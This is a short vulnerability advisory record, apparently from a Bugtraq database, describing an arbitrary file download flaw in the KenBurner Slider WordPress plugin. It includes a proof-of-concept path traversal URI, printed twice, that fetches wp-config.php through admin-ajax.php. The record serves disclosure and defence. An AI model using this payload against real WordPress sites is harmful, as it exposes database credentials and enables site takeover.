WordPress KenBurner Slider Plugin 'admin-ajax.php' Arbitrary File Download Vulnerabilitiy
BID:69387
Info
WordPress KenBurner Slider Plugin 'admin-ajax.php' Arbitrary File Download Vulnerabilitiy
| Bugtraq ID: | 69387 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 24 2014 12:00AM |
| Updated: | Aug 24 2014 12:00AM |
| Credit: | MF0x and Daniel Pen |
| Vulnerable: |
ENVATO KenBurner Slider 0 |
| Not Vulnerable: | |
Exploit / POC
WordPress KenBurner Slider Plugin 'admin-ajax.php' Arbitrary File Download Vulnerabilitiy
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php